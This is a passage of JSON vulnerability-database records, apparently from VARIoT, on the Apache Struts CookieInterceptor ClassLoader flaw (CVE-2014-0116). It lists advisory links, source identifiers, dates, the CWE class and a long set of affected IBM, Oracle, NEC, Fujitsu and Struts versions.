          },
          {
            "db": "BID",
            "id": "67218"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002411"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201405-150"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0116"
          }
        ]
      },
      "id": "VAR-201405-0502",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.1875
      },
      "last_update_date": "2025-04-13T23:31:38.779000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "1680848",
            "trust": 0.8,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680848"
          },
          {
            "title": "1681190",
            "trust": 0.8,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681190"
          },
          {
            "title": "NV15-001",
            "trust": 0.8,
            "url": "http://jpn.nec.com/security-info/secinfo/nv15-001.html"
          },
          {
            "title": "Oracle Critical Patch Update Advisory - April 2015",
            "trust": 0.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html"
          },
          {
            "title": "Text Form of Oracle Critical Patch Update - April 2015 Risk Matrices",
            "trust": 0.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015verbose-2365613.html"
          },
          {
            "title": "Bug 1094558",
            "trust": 0.8,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1094558"
          },
          {
            "title": "Huawei-SA-20140707-01-Struts2",
            "trust": 0.8,
            "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-350733.htm"
          },
          {
            "title": "April 2015 Critical Patch Update Released",
            "trust": 0.8,
            "url": "https://blogs.oracle.com/security/entry/april_2015_critical_patch_update"
          },
          {
            "title": "S2-022",
            "trust": 0.8,
            "url": "http://struts.apache.org/release/2.3.x/docs/s2-022.html"
          },
          {
            "title": "CVE-2014-0094 \u4ed6 \u306b\u95a2\u3059\u308b\u5f71\u97ff",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/vulnerabilities/cve2014-0094-0114.html"
          },
          {
            "title": "Symfoware Server\uff08Open\u30a4\u30f3\u30bf\u30d5\u30a7\u30fc\u30b9\uff09: Struts\u306e\u8106\u5f31\u6027(CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0116) (2014\u5e746\u67082\u65e5)",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/symfoware_201402.html"
          },
          {
            "title": "FUJITSU Integrated System HA Database Ready: Struts2\u306e\u8106\u5f31\u6027(CVE-2014-0094,CVE-2014-0112,CVE-2014-0113,CVE-2014-0116) (2014\u5e746\u670819\u65e5)",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/ha_db_ready_201401.html"
          },
          {
            "title": "Red Hat: CVE-2014-0116",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2014-0116"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - April 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4b527561ba1a5de7a529c8a93679f585"
          },
          {
            "title": "-maven-security-versions",
            "trust": 0.1,
            "url": "https://github.com/nagauker/-maven-security-versions "
          },
          {
            "title": "maven-security-versions-Travis",
            "trust": 0.1,
            "url": "https://github.com/klee94/maven-security-versions-Travis "
          },
          {
            "title": "maven-security-versions",
            "trust": 0.1,
            "url": "https://github.com/victims/maven-security-versions "
          },
          {
            "title": "victims",
            "trust": 0.1,
            "url": "https://github.com/tmpgit3000/victims "
          },
          {
            "title": "victims",
            "trust": 0.1,
            "url": "https://github.com/alexsh88/victims "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0116"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002411"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-264",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002411"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0116"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "http://struts.apache.org/release/2.3.x/docs/s2-022.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/67218"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/59816"
          },
          {
            "trust": 1.7,
            "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-350733.htm"
          },
          {
            "trust": 1.7,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0116"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0116"
          },
          {
            "trust": 0.3,
            "url": "http://struts.apache.org/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/264.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=34163"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/victims/maven-security-versions"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0116"
          },
          {
            "db": "BID",
            "id": "67218"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002411"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201405-150"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0116"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0116"
          },
          {
            "db": "BID",
            "id": "67218"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002411"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201405-150"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0116"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-05-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-0116"
          },
          {
            "date": "2014-05-06T00:00:00",
            "db": "BID",
            "id": "67218"
          },
          {
            "date": "2014-05-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-002411"
          },
          {
            "date": "2014-05-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201405-150"
          },
          {
            "date": "2014-05-08T10:55:02.967000",
            "db": "NVD",
            "id": "CVE-2014-0116"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-12T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-0116"
          },
          {
            "date": "2015-04-16T18:14:00",
            "db": "BID",
            "id": "67218"
          },
          {
            "date": "2016-08-02T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-002411"
          },
          {
            "date": "2019-08-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201405-150"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2014-0116"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201405-150"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Apache Struts of  CookieInterceptor In  ClassLoader Vulnerability manipulated",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002411"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "permissions and access control issues",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201405-150"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201404-0287

    Vulnerability from variot - Updated: 2025-04-13 22:09

    CookieInterceptor in Apache Struts before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094. This vulnerability CVE-2014-0094 Vulnerability due to insufficient fix for.Through a crafted request by a third party, ClassLoader The " operation (manipulate)" And any code could be executed. Apache Struts is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Apache Struts versions 2.0.0 through 2.3.16.1 are vulnerable

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0287",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "struts",
            "scope": "lt",
            "trust": 1.8,
            "vendor": "apache",
            "version": "2.3.16.2"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "ibm",
            "version": "4.5"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "struts",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.0"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.3.4"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.3.8"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.3.7"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.3.16.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.3.16"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.3.15.3"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.3.15.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "apache",
            "version": "2.3.15.1"
          },
          {
            "model": "connections",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "ibm",
            "version": "3.0.1.1"
          },
          {
            "model": "mysql",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "oracle",
            "version": "enterprise monitor 2.3.16"
          },
          {
            "model": "mysql",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "oracle",
            "version": "enterprise monitor 3.0.10"
          },
          {
            "model": "esmpro/servermanager",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "nec",
            "version": "ver5.75"
          },
          {
            "model": "infocage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "pc security"
          },
          {
            "model": "infocage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "security risk management  v1.0.0 to  v2.1.3"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "enterprise edition v5.1 to  v5.2"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "enterprise edition v6.1 to  v6.5"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "rfid manager enterprise v7.1"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "rfid manager lite v2.0"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "rfid manager standard v2.0"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "standard edition v5.1 to  v5.2"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "standard edition v6.1 to  v6.5"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "standard-j edition v5.1 to  v5.2"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "standard-j edition v6.1 to  v6.5"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "web edition v5.1 to  v5.2"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "web edition v6.1 to  v6.5"
          },
          {
            "model": "webotx application server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v7.1"
          },
          {
            "model": "webotx developer",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "\"v8.2 to  v8.4 (with developers studio only )\""
          },
          {
            "model": "webotx developer",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "\"v9.1 to  v9.2 (with developers studio only )\""
          },
          {
            "model": "webotx portal",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v8.3 to  v8.4"
          },
          {
            "model": "webotx portal",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v9.1"
          },
          {
            "model": "integrated system ha database ready",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "interstage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "business analytics modeling server"
          },
          {
            "model": "interstage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "business process manager analytics"
          },
          {
            "model": "interstage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "extreme transaction processing server"
          },
          {
            "model": "interstage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "mobile manager"
          },
          {
            "model": "interstage application development cycle manager",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "interstage application framework suite",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "interstage application server",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "interstage apworks",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "interstage business application server",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "interstage job workload server",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "interstage service integrator",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "interstage studio",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "serverview",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "resource orchestrator"
          },
          {
            "model": "symfoware",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "analytics server"
          },
          {
            "model": "symfoware",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "server"
          },
          {
            "model": "systemwalker service catalog manager",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "systemwalker service quality coordinator",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "systemwalker software configuration manager",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "triole",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "cloud middle set  b set"
          },
          {
            "model": "cloud infrastructure management software",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "apache",
            "version": "2.3.4.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "apache",
            "version": "2.3.3"
          },
          {
            "model": "keybox",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "skavanagh",
            "version": "2.10.02"
          },
          {
            "model": "ec2box",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "skavanagh",
            "version": "0.11.01"
          },
          {
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.0.10"
          },
          {
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3.16"
          },
          {
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3.15"
          },
          {
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3.14"
          },
          {
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3.13"
          },
          {
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.0"
          },
          {
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3"
          },
          {
            "model": "sterling web channel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "model": "sterling web channel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "model": "sterling selling and fulfillment foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.2.1"
          },
          {
            "model": "sterling selling and fulfillment foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.2"
          },
          {
            "model": "sterling selling and fulfillment foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "model": "sterling selling and fulfillment foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "model": "sterling order management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "model": "sterling field sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.2.1"
          },
          {
            "model": "sterling field sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.2.0"
          },
          {
            "model": "sterling field sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.0"
          },
          {
            "model": "sterling field sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "model": "platform symphony",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.1"
          },
          {
            "model": "platform symphony",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "model": "platform symphony",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2"
          },
          {
            "model": "platform hpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.1"
          },
          {
            "model": "platform hpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1"
          },
          {
            "model": "platform hpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2"
          },
          {
            "model": "platform cluster manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.1"
          },
          {
            "model": "platform cluster manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1"
          },
          {
            "model": "platform cluster manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2"
          },
          {
            "model": "platform application center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.2"
          },
          {
            "model": "platform application center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.1"
          },
          {
            "model": "platform application center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "model": "platform application center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.3"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.00"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.10"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.1"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.0"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.5.0.3"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.5.0.2"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.5.0.1"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.5.0.0"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.1.1"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.0.0"
          },
          {
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.0.2"
          },
          {
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.0.1"
          },
          {
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.3.0"
          },
          {
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.2.0"
          },
          {
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.1.3"
          },
          {
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.1.0"
          },
          {
            "model": "clearpass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "5.0"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.41"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.3"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.8"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.6"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.5"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.14"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.12"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.11"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.10"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.9"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.8"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.7"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.6"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.5"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.4"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.3"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.15"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.14.3"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.14.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.14.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.14"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.1.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.1.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.3.1"
          },
          {
